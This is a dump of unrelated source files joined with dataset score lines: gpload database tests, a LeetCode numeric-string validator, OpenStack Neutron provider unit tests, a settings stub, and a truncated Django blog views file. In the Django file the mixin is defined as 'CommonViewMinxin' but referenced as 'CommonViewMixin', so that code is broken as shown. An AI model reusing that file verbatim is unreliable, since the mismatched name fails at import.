like 'ext_gpload_reusable%'
OR relname
like 'staging_gpload_reusable%';"""
resultList = db.query(queryString.encode('utf-8')).getresult()
return resultList
def drop_tables():
try:
db = pg.DB(dbname='reuse_gptest'
,host='localhost'
,port=int(PGPORT)
)
except Exception,e:
errorMessage = str(e)
print 'could not connect to database: ' + errorMessage
list = get_table_name()
for i in list:
name = i[0]
match = re.search('ext_gpload',name)
if match:
queryString = "DROP EXTERNAL TABLE %s" % name
db.query(queryString.encode('utf-8'))
else:
queryString = "DROP TABLE %s" % name
db.query(queryString.encode('utf-8'))
class PSQLError(Exception):
'''
PSQLError is the base class for exceptions in this module
http://docs.python.org/tutorial/errors.html
We want to raise an error and not a failure. The reason for an error
might be program error, file not found, etc.
Failure is define as test case failures, when the output is different
from the expected result.
'''
pass
class GPLoad_FormatOpts_TestCase(unittest.TestCase):
def check_result(self,ifile, optionalFlags = "-U3", outputPath = ""):
"""
PURPOSE: compare the actual and expected output files and report an
error if they don't match.
PARAMETERS:
ifile: the name of the .sql file whose actual and expected outputs
we want to compare. You may include the path as well as the
filename. This function will process this file name to
figure out the proper names of the .out and .ans files.
optionalFlags: command-line options (if any) for diff.
For example, pass " -B " (with the blank spaces) to ignore
blank lines. By default, diffs are unified with 3 lines of
context (i.e. optionalFlags is "-U3").
"""
f1 = gpdbAnsFile(ifile)
f2 = outFile(ifile, outputPath=outputPath)
result = isFileEqual(f1, f2, optionalFlags, outputPath=outputPath)
diff = None if result else read_diff(ifile, outputPath)
self.assertTrue(result, "query resulted in diff:\n{}".format(diff))
return True
def doTest(self, num):
file = mkpath('query%d.diff' % num)
if os.path.isfile(file):
run("rm -f" + " " + file)
modify_sql_file(num)
file = mkpath('query%d.sql' % num)
runfile(file)
self.check_result(file)
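# In short (descriptive note): doTest(n) removes any stale query<n>.diff, rewrites
# "gpload.py " to "gpload " inside query<n>.sql, runs that file through psql, and
# then compares query<n>.out against the checked-in query<n>.ans answer file via
# gpdiff.pl; if a .diff survives, its contents become the failure message.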
def test_00_gpload_formatOpts_setup(self):
"0 gpload setup"
for num in range(1,40):
f = open(mkpath('query%d.sql' % num),'w')
f.write("\! gpload -f "+mkpath('config/config_file')+ " -d reuse_gptest\n"+"\! gpload -f "+mkpath('config/config_file')+ " -d reuse_gptest\n")
f.close()
file = mkpath('setup.sql')
runfile(file)
self.check_result(file)
def test_01_gpload_formatOpts_delimiter(self):
"1 gpload formatOpts delimiter '|' with reuse "
copy_data('external_file_01.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="'|'")
self.doTest(1)
def test_02_gpload_formatOpts_delimiter(self):
"2 gpload formatOpts delimiter '\t' with reuse"
copy_data('external_file_02.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="'\t'")
self.doTest(2)
def test_03_gpload_formatOpts_delimiter(self):
"3 gpload formatOpts delimiter E'\t' with reuse"
copy_data('external_file_02.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="E'\\t'")
self.doTest(3)
def test_04_gpload_formatOpts_delimiter(self):
"4 gpload formatOpts delimiter E'\u0009' with reuse"
copy_data('external_file_02.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="E'\u0009'")
self.doTest(4)
def test_05_gpload_formatOpts_delimiter(self):
"5 gpload formatOpts delimiter E'\\'' with reuse"
copy_data('external_file_03.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="E'\''")
self.doTest(5)
def test_06_gpload_formatOpts_delimiter(self):
"6 gpload formatOpts delimiter \"'\" with reuse"
copy_data('external_file_03.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',delimiter="\"'\"")
self.doTest(6)
def test_07_gpload_reuse_table_insert_mode_without_reuse(self):
"7 gpload insert mode without reuse"
runfile(mkpath('setup.sql'))
f = open(mkpath('query7.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from texttable;'")
f.close()
write_config_file(mode='insert',reuse_flag='false')
self.doTest(7)
def test_08_gpload_reuse_table_update_mode_with_reuse(self):
"8 gpload update mode with reuse"
drop_tables()
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='true',file='data_file.txt')
self.doTest(8)
def test_09_gpload_reuse_table_update_mode_without_reuse(self):
"9 gpload update mode without reuse"
f = open(mkpath('query9.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from texttable;'\n"+"\! psql -d reuse_gptest -c 'select * from texttable where n2=222;'")
f.close()
copy_data('external_file_05.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='false',file='data_file.txt')
self.doTest(9)
def test_10_gpload_reuse_table_merge_mode_with_reuse(self):
"10 gpload merge mode with reuse "
drop_tables()
copy_data('external_file_06.txt','data_file.txt')
write_config_file('merge','true',file='data_file.txt')
self.doTest(10)
def test_11_gpload_reuse_table_merge_mode_without_reuse(self):
"11 gpload merge mode without reuse "
copy_data('external_file_07.txt','data_file.txt')
write_config_file('merge','false',file='data_file.txt')
self.doTest(11)
def test_12_gpload_reuse_table_merge_mode_with_different_columns_number_in_file(self):
"12 gpload merge mode with reuse (RERUN with different columns number in file) "
psql_run(cmd="ALTER TABLE texttable ADD column n8 text",dbname='reuse_gptest')
copy_data('external_file_08.txt','data_file.txt')
write_config_file('merge','true',file='data_file.txt')
self.doTest(12)
def test_13_gpload_reuse_table_merge_mode_with_different_columns_number_in_DB(self):
"13 gpload merge mode with reuse (RERUN with different columns number in DB table) "
preTest = mkpath('pre_test_13.sql')
psql_run(preTest, dbname='reuse_gptest')
copy_data('external_file_09.txt','data_file.txt')
write_config_file('merge','true',file='data_file.txt')
self.doTest(13)
def test_14_gpload_reuse_table_update_mode_with_reuse_RERUN(self):
"14 gpload update mode with reuse (RERUN) "
write_config_file('update','true',file='data_file.txt')
self.doTest(14)
def test_15_gpload_reuse_table_merge_mode_with_different_columns_order(self):
"15 gpload merge mode with different columns' order "
copy_data('external_file_10.txt','data/data_file.tbl')
write_config_file('merge','true',file='data/data_file.tbl',columns_flag='1',mapping='1')
self.doTest(15)
def test_16_gpload_formatOpts_quote(self):
"16 gpload formatOpts quote unspecified in CSV with reuse "
copy_data('external_file_11.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','")
self.doTest(16)
def test_17_gpload_formatOpts_quote(self):
"17 gpload formatOpts quote '\\x26'(&) with reuse"
copy_data('external_file_12.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",quote="'\x26'")
self.doTest(17)
def test_18_gpload_formatOpts_quote(self):
"18 gpload formatOpts quote E'\\x26'(&) with reuse"
copy_data('external_file_12.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",quote="E'\x26'")
self.doTest(18)
def test_19_gpload_formatOpts_escape(self):
"19 gpload formatOpts escape '\\' with reuse"
copy_data('external_file_01.txt','data_file.txt')
file = mkpath('setup.sql')
runfile(file)
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',escape='\\')
self.doTest(19)
def test_20_gpload_formatOpts_escape(self):
"20 gpload formatOpts escape '\\' with reuse"
copy_data('external_file_01.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',escape= '\x5C')
self.doTest(20)
def test_21_gpload_formatOpts_escape(self):
"21 gpload formatOpts escape E'\\\\' with reuse"
copy_data('external_file_01.txt','data_file.txt')
write_config_file(reuse_flag='true',formatOpts='text',file='data_file.txt',table='texttable',escape="E'\\\\'")
self.doTest(21)
# case 22 is flaky on concourse. It may report: Fatal Python error: GC object already tracked during testing.
# This is a rare issue; we can't reproduce it locally, so we disable it in order not to block others.
#def test_22_gpload_error_count(self):
# "22 gpload error count"
# f = open(mkpath('query22.sql'),'a')
# f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
# f.close()
# f = open(mkpath('data/large_file.csv'),'w')
# for i in range(0, 10000):
# if i % 2 == 0:
# f.write('1997,Ford,E350,"ac, abs, moon",3000.00,a\n')
# else:
# f.write('1997,Ford,E350,"ac, abs, moon",3000.00\n')
# f.close()
# copy_data('large_file.csv','data_file.csv')
# write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='90000000')
# self.doTest(22)
def test_23_gpload_error_count(self):
"23 gpload error_table"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query23.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
f = open(mkpath('data/large_file.csv'),'w')
for i in range(0, 10000):
if i % 2 == 0:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00,a\n')
else:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00\n')
f.close()
copy_data('large_file.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",error_table="err_table",error_limit='90000000')
self.doTest(23)
def test_24_gpload_error_count(self):
"24 gpload error count with ext schema"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query24.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
f = open(mkpath('data/large_file.csv'),'w')
for i in range(0, 10000):
if i % 2 == 0:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00,a\n')
else:
f.write('1997,Ford,E350,"ac, abs, moon",3000.00\n')
f.close()
copy_data('large_file.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='90000000',externalSchema='test')
self.doTest(24)
def test_25_gpload_ext_staging_table(self):
"25 gpload reuse ext_staging_table if it is configured"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query25.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='staging_table')
self.doTest(25)
def test_26_gpload_ext_staging_table_with_externalschema(self):
"26 gpload reuse ext_staging_table if it is configured with externalschema"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query26.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='staging_table',externalSchema='test')
self.doTest(26)
def test_27_gpload_ext_staging_table_with_externalschema(self):
"27 gpload reuse ext_staging_table if it is configured with externalschema"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query27.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from test.csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='test.csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='staging_table',externalSchema="'%'")
self.doTest(27)
def test_28_gpload_ext_staging_table_with_dot(self):
"28 gpload reuse ext_staging_table if it is configured with dot"
file = mkpath('setup.sql')
runfile(file)
f = open(mkpath('query28.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from test.csvtable;'")
f.close()
copy_data('external_file_13.csv','data_file.csv')
write_config_file(reuse_flag='true',formatOpts='csv',file='data_file.csv',table='test.csvtable',format='csv',delimiter="','",log_errors=True,error_limit='10',staging_table='t.staging_table')
self.doTest(28)
def test_29_gpload_reuse_table_insert_mode_with_reuse_and_null(self):
"29 gpload insert mode with reuse and null"
runfile(mkpath('setup.sql'))
f = open(mkpath('query29.sql'),'a')
f.write("\! psql -d reuse_gptest -c 'select count(*) from texttable where n2 is null;'")
f.close()
copy_data('external_file_14.txt','data_file.txt')
write_config_file(mode='insert',reuse_flag='true',file='data_file.txt',log_errors=True, error_limit='100')
self.doTest(29)
def test_30_gpload_reuse_table_update_mode_with_fast_match(self):
"30 gpload update mode with fast match"
drop_tables()
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='true',fast_match='true',file='data_file.txt')
self.doTest(30)
def test_31_gpload_reuse_table_update_mode_with_fast_match_and_different_columns_number(self):
"31 gpload update mode with fast match and differenct columns number) "
psql_run(cmd="ALTER TABLE texttable ADD column n8 text",dbname='reuse_gptest')
copy_data('external_file_08.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='true',fast_match='true',file='data_file.txt')
self.doTest(31)
def test_32_gpload_update_mode_without_reuse_table_with_fast_match(self):
"32 gpload update mode when reuse table is false and fast match is true"
drop_tables()
copy_data('external_file_08.txt','data_file.txt')
write_config_file(mode='update',reuse_flag='false',fast_match='true',file='data_file.txt')
self.doTest(32)
def test_33_gpload_reuse_table_merge_mode_with_fast_match_and_external_schema(self):
"33 gpload update mode with fast match and external schema"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='true',file='data_file.txt',externalSchema='test')
self.doTest(33)
def test_34_gpload_reuse_table_merge_mode_with_fast_match_and_encoding(self):
"34 gpload merge mode with fast match and encoding GBK"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='true',file='data_file.txt',encoding='GBK')
self.doTest(34)
def test_35_gpload_reuse_table_merge_mode_with_fast_match_default_encoding(self):
"35 gpload does not reuse table when encoding is setted from GBK to empty"
write_config_file(mode='merge',reuse_flag='true',fast_match='true',file='data_file.txt')
self.doTest(35)
def test_36_gpload_reuse_table_merge_mode_default_encoding(self):
"36 gpload merge mode with encoding GBK"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='false',file='data_file.txt',encoding='GBK')
self.doTest(36)
def test_37_gpload_reuse_table_merge_mode_invalid_encoding(self):
"37 gpload merge mode with invalid encoding"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='merge',reuse_flag='true',fast_match='false',file='data_file.txt',encoding='xxxx')
self.doTest(37)
def test_38_gpload_without_preload(self):
"38 gpload insert mode without preload"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='insert',reuse_flag='true',fast_match='false',file='data_file.txt',error_table="err_table",error_limit='1000',preload=False)
self.doTest(38)
def test_39_gpload_fill_missing_fields(self):
"39 gpload fill missing fields"
file = mkpath('setup.sql')
runfile(file)
copy_data('external_file_04.txt','data_file.txt')
write_config_file(mode='insert',reuse_flag='false',fast_match='false',file='data_file.txt',table='texttable1', error_limit='1000', fill=True)
self.doTest(39)
if __name__ == '__main__':
suite = unittest.TestLoader().loadTestsFromTestCase(GPLoad_FormatOpts_TestCase)
runner = unittest.TextTestRunner(verbosity=2)
ret = not runner.run(suite).wasSuccessful()
sys.exit(ret)
| 2.453125 | 2 |
code_week19_831_96/biao_shi_shu_zi.py | dylanlee101/leetcode | 0 | 1102 | <filename>code_week19_831_96/biao_shi_shu_zi.py
'''
Implement a function that determines whether a string represents a numeric value
(including integers and decimals). For example, the strings "+100", "5e2", "-123",
"3.1416", "-1E-16" and "0123" all represent numeric values, while "12e", "1a3.14",
"1.2.3", "+-5" and "12e+5.4" do not.
Source: LeetCode (力扣)
Link: https://leetcode-cn.com/problems/biao-shi-shu-zhi-de-zi-fu-chuan-lcof
'''
class Solution:
def isNumber(self, s: str) -> bool:
states = [
{ ' ': 0, 's': 1, 'd': 2, '.': 4 }, # 0. start with 'blank'
{ 'd': 2, '.': 4 } , # 1. 'sign' before 'e'
{ 'd': 2, '.': 3, 'e': 5, ' ': 8 }, # 2. 'digit' before 'dot'
{ 'd': 3, 'e': 5, ' ': 8 }, # 3. 'digit' after 'dot'
{ 'd': 3 }, # 4. 'digit' after 'dot' (‘blank’ before 'dot')
{ 's': 6, 'd': 7 }, # 5. 'e'
{ 'd': 7 }, # 6. 'sign' after 'e'
{ 'd': 7, ' ': 8 }, # 7. 'digit' after 'e'
{ ' ': 8 } # 8. end with 'blank'
]
p = 0 # start with state 0
for c in s:
if '0' <= c <= '9': t = 'd' # digit
elif c in "+-": t = 's' # sign
elif c in "eE": t = 'e' # e or E
elif c in ". ": t = c # dot, blank
else: t = '?' # unknown
if t not in states[p]: return False
p = states[p][t]
return p in (2, 3, 7, 8)
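# A quick self-check of the DFA above, using the examples quoted in the problem
# statement (an illustrative addition, not part of the original submission):
if __name__ == '__main__':
    s = Solution()
    assert all(s.isNumber(x) for x in ["+100", "5e2", "-123", "3.1416", "-1E-16", "0123"])
    assert not any(s.isNumber(x) for x in ["12e", "1a3.14", "1.2.3", "+-5", "12e+5.4"])
    print("all sample strings classified as expected")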
| 2.859375 | 3 |
teeth_overlord/tests/unit/networks/neutron.py | rackerlabs/teeth-overlord | 0 | 1103 | <reponame>rackerlabs/teeth-overlord
"""
Copyright 2013 Rackspace, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import collections
from teeth_overlord import config
from teeth_overlord.networks import neutron
from teeth_overlord import tests
from keystoneclient.apiclient import exceptions as keystone_exceptions
from keystoneclient.v2_0 import client as keystone_client
from neutronclient.common import exceptions as neutron_exceptions
from neutronclient.neutron import client as neutron_client
NETWORK1_RESPONSE = {
u'status': u'ACTIVE',
u'subnets': [u'SUBNET1'],
u'name': u'private',
u'provider:physical_network': None,
u'admin_state_up': True,
u'tenant_id': u'TENANTID',
u'provider:network_type': u'local',
u'router:external': False,
u'shared': False,
u'id': u'NETWORK1',
u'provider:segmentation_id': None
}
NETWORK2_RESPONSE = {
u'status': u'ACTIVE',
u'subnets': [u'SUBNET2'],
u'name': u'public',
u'provider:physical_network': None,
u'admin_state_up': True,
u'tenant_id': u'TENANTID',
u'provider:network_type': u'local',
u'router:external': True,
u'shared': False,
u'id': u'NETWORK2',
u'provider:segmentation_id': None
}
PORT1_RESPONSE = {
u'status': u'ACTIVE',
u'binding:host_id': u'precise64',
u'name': u'',
u'allowed_address_pairs': [],
u'admin_state_up': True,
u'network_id': u'NETWORK1',
u'tenant_id': u'TENANTID',
u'extra_dhcp_opts': [],
u'binding:vif_type': u'ovs',
u'device_owner': u'network:dhcp',
u'binding:capabilities': {u'port_filter': True},
u'mac_address': u'fa:16:3e:e0:d4:63',
u'fixed_ips': [
{
u'subnet_id': u'SUBNET1',
u'ip_address': u'10.0.0.3'
}
],
u'id': u'PORT1',
u'security_groups': [],
u'device_id': u''
}
PORT2_RESPONSE = {
u'status': u'DOWN',
u'binding:host_id': u'',
u'name': u'',
u'allowed_address_pairs': [],
u'admin_state_up': True,
u'network_id': u'NETWORK2',
u'tenant_id': u'TENANTID',
u'extra_dhcp_opts': [],
u'binding:vif_type': u'unbound',
u'device_owner': u'',
u'binding:capabilities': {u'port_filter': False},
u'mac_address': u'00:09:7b:3e:18:ca',
u'fixed_ips': [
{
u'subnet_id': u'SUBNET2',
u'ip_address': u'192.168.27.3'
}
],
u'id': u'PORT2',
u'security_groups': [u'SECGRP'],
u'device_id': u''
}
SUBNET1_RESPONSE = {
u'name': u'private-subnet',
u'enable_dhcp': True,
u'network_id': u'NETWORK1',
u'tenant_id': u'TENANTID',
u'dns_nameservers': [],
u'allocation_pools': [
{
u'start': u'10.0.0.2',
u'end': u'10.0.0.254'
}
],
u'host_routes': [],
u'ip_version': 4,
u'gateway_ip': u'10.0.0.1',
u'cidr': u'10.0.0.0/24',
u'id': u'SUBNET1'
}
SUBNET2_RESPONSE = {
u'name': u'public-subnet',
u'enable_dhcp': False,
u'network_id': u'NETWORK2',
u'tenant_id': u'TENANTID',
u'dns_nameservers': [],
u'allocation_pools': [
{
u'start': u'192.168.27.1',
u'end': u'192.168.27.1'
},
{
u'start': u'192.168.27.3',
u'end': u'192.168.27.254'
}
],
u'host_routes': [],
u'ip_version': 4,
u'gateway_ip': u'192.168.27.2',
u'cidr': u'192.168.27.0/24',
u'id': u'SUBNET2'
}
SERIALIZED_NETWORK1 = collections.OrderedDict([
('id', u'NETWORK1'),
('name', u'private'),
('status', u'ACTIVE'),
('subnets', [
collections.OrderedDict([
('id', u'SUBNET1'),
('name', u'private-subnet'),
('ip_version', 4),
('gateway_ip', u'10.0.0.1'),
('cidr', u'10.0.0.0/24'),
('enable_dhcp', True)
])
])
])
SERIALIZED_NETWORK2 = collections.OrderedDict([
('id', u'NETWORK2'),
('name', u'public'),
('status', u'ACTIVE'),
('subnets', [
collections.OrderedDict([
('id', u'SUBNET2'),
('name', u'public-subnet'),
('ip_version', 4),
('gateway_ip', u'192.168.27.2'),
('cidr', u'192.168.27.0/24'),
('enable_dhcp', False)
])
])
])
SERIALIZED_PORT1 = collections.OrderedDict([
('id', u'PORT1'),
('name', u''),
('status', u'ACTIVE'),
('mac_address', u'fa:16:3e:e0:d4:63'),
('fixed_ips', [
{
u'subnet_id': u'SUBNET1',
u'ip_address': u'10.0.0.3'
}
]),
('network', SERIALIZED_NETWORK1)
])
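# Note (descriptive): each SERIALIZED_* constant above is the expected result of
# the provider's serialize() call for the matching *_RESPONSE payload;
# SERIALIZED_PORT1 embeds SERIALIZED_NETWORK1 because PORT1_RESPONSE points at
# NETWORK1 and SUBNET1.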
class TestNeutronProvider(tests.TeethMockTestUtilities):
def setUp(self):
super(TestNeutronProvider, self).setUp()
self.config = config.LazyConfig(config={
'KEYSTONE_USER': 'user',
'KEYSTONE_PASS': '<PASSWORD>',
'KEYSTONE_TENANT_ID': 'tenant',
'KEYSTONE_AUTH_URL': 'auth_url',
'NEUTRON_VERSION': '2.0',
'NEUTRON_URL': 'neutron_url',
'NEUTRON_PUBLIC_NETWORK': 'd6b32008-1432-4299-81c7-cbe3128ba13f',
'NEUTRON_PRIVATE_NETWORK': '2afa16d6-7b84-484f-a642-af243b0e5b10',
'NEUTRON_SERVICE_NETWORK': '2afa16d6-7b84-484f-a642-af243b0e5b10',
})
self.neutron_client_mock = self.add_mock(neutron_client, 'Client')
self.neutron_mock = self.neutron_client_mock.return_value
self.keystone_client_mock = self.add_mock(keystone_client, 'Client')
self.keystone_client_mock.return_value.auth_token = 'auth_token'
self.provider = neutron.NeutronProvider(self.config)
def test_get_auth_token(self):
t = self.provider._get_auth_token()
self.assertEqual(t, 'auth_token')
self.keystone_client_mock.assert_called_with(
username='user',
password='<PASSWORD>',
tenant_id='tenant',
auth_url='auth_url'
)
def test_get_auth_token_client_exception(self):
exc = keystone_exceptions.ClientException
self.keystone_client_mock.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider._get_auth_token)
def test_get_neutron_client(self):
self.provider._get_neutron_client()
self.neutron_client_mock.assert_called_with(
'2.0',
endpoint_url='neutron_url',
token='auth_token'
)
def test_get_neutron_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_client_mock.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider._get_neutron_client)
def test_list_networks(self):
networks = {'networks': [NETWORK1_RESPONSE,
NETWORK2_RESPONSE]}
self.neutron_mock.list_networks.return_value = networks
self.neutron_mock.show_subnet.side_effect = [
{'subnet': SUBNET1_RESPONSE},
{'subnet': SUBNET2_RESPONSE}
]
networks = self.provider.list_networks()
results = [
SERIALIZED_NETWORK1,
SERIALIZED_NETWORK2
]
self.assertEqual([n.serialize() for n in networks], results)
def test_list_networks_empty(self):
self.neutron_mock.list_networks.return_value = {'networks': []}
networks = self.provider.list_networks()
self.neutron_mock.list_networks.assert_called()
self.assertEqual(networks, [])
def test_list_networks_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_mock.list_networks.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.list_networks)
def test_get_network_info(self):
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
self.neutron_mock.show_subnet.side_effect = [
{'subnet': SUBNET1_RESPONSE}
]
network = self.provider.get_network_info('NETWORK1')
self.assertEqual(network.serialize(), SERIALIZED_NETWORK1)
self.neutron_mock.show_network.assert_called_with('NETWORK1')
def test_get_network_info_does_not_exist(self):
exc = neutron_exceptions.NeutronException()
exc.message = '404 Not Found'
self.neutron_mock.show_network.side_effect = exc
self.assertRaises(self.provider.NetworkDoesNotExist,
self.provider.get_network_info,
'NETWORK1')
def test_get_network_info_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_mock.show_network.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.get_network_info,
'NETWORK1')
def test_list_ports(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
ports = self.provider.list_ports('a:b:c:d')
self.assertEqual([p.serialize() for p in ports], [SERIALIZED_PORT1])
self.neutron_mock.list_ports.assert_called_with(mac_address='a:b:c:d')
def test_attach(self):
port = {'port': PORT1_RESPONSE}
self.neutron_mock.create_port.return_value = port
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
port = self.provider.attach('a:b:c:d', 'network_id')
self.neutron_mock.create_port.assert_called_with({
'port': {
'network_id': 'network_id',
'admin_state_up': True,
'mac_address': 'a:b:c:d'
}
})
self.assertEqual(port.serialize(), SERIALIZED_PORT1)
def test_attach_client_exception(self):
exc = neutron_exceptions.NeutronException()
self.neutron_mock.create_port.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.attach,
'mac_address', 'network_id')
def test_detatch(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
self.provider.detach('a:b:c:d')
self.neutron_mock.delete_port.assert_called_with(PORT1_RESPONSE['id'])
self.neutron_mock.list_ports.assert_called_with(mac_address='a:b:c:d')
def test_detach_specific_network(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
self.provider.detach('a:b:c:d', 'network_id')
self.neutron_mock.delete_port.assert_called_with(PORT1_RESPONSE['id'])
self.neutron_mock.list_ports.assert_called_with(
mac_address='a:b:c:d', network_id='network_id')
def test_detach_client_exception(self):
ports = {'ports': [PORT1_RESPONSE]}
self.neutron_mock.list_ports.return_value = ports
network = {'network': NETWORK1_RESPONSE}
self.neutron_mock.show_network.return_value = network
subnet = {'subnet': SUBNET1_RESPONSE}
self.neutron_mock.show_subnet.return_value = subnet
exc = neutron_exceptions.NeutronException()
self.neutron_mock.delete_port.side_effect = exc
self.assertRaises(self.provider.NetworkProviderException,
self.provider.detach,
'a:b:c:d')
def test_get_default_networks(self):
network_ids = self.provider.get_default_networks()
self.assertEqual(network_ids, [self.config.NEUTRON_PUBLIC_NETWORK,
self.config.NEUTRON_PRIVATE_NETWORK])
def test_get_service_network(self):
network_id = self.provider.get_service_network()
self.assertEqual(network_id, self.config.NEUTRON_SERVICE_NETWORK)
| 1.390625 | 1 |
classes/settings.py | johnyburd/glucometer | 12 | 1104 | def init():
global brightness
global calibration_mode
brightness = 500
calibration_mode = False
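# Illustrative usage (assuming the module is importable as `settings`, a guess
# based on the file name): call init() once at startup, then read or overwrite
# the module-level globals from anywhere that imports it.
#   import settings
#   settings.init()
#   settings.brightness = 300        # e.g. dim the display
#   if settings.calibration_mode:
#       pass                         # run the calibration flow instead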
| 1.414063 | 1 |
typeidea/blog/views.py | Phoenix-sy/typeidea | 0 | 1105 | from datetime import date
from django.core.cache import cache
from django.db.models import Q, F
from django.shortcuts import render
from django.shortcuts import get_object_or_404
from django.views.generic import ListView, DetailView
#from silk.profiling.profiler import silk_profile
from config.models import SideBar
from .models import Post, Tag, Category
from comment.models import Comment
class CommonViewMinxin:
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context.update({
'sidebars': self.get_sidebars(),
})
context.update(self.get_navs())
return context
def get_sidebars(self):
return SideBar.objects.filter(status=SideBar.STATUS_SHOW)
def get_navs(self):
categories = Category.objects.filter(status=Category.STATUS_NORMAL)
nav_categories = []
normal_categories = []
for cate in categories:
if cate.is_nav:
nav_categories.append(cate)
else:
normal_categories.append(cate)
return {
'navs': nav_categories,
'categories': normal_categories,
}
class IndexView(CommonViewMixin, ListView):
queryset = Post.latest_posts()
paginate_by = 5
context_object_name = 'post_list'
template_name = 'blog/list.html'
class CategoryView(IndexView):
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
category_id = self.kwargs.get('category_id')
category = get_object_or_404(Category, pk=category_id)
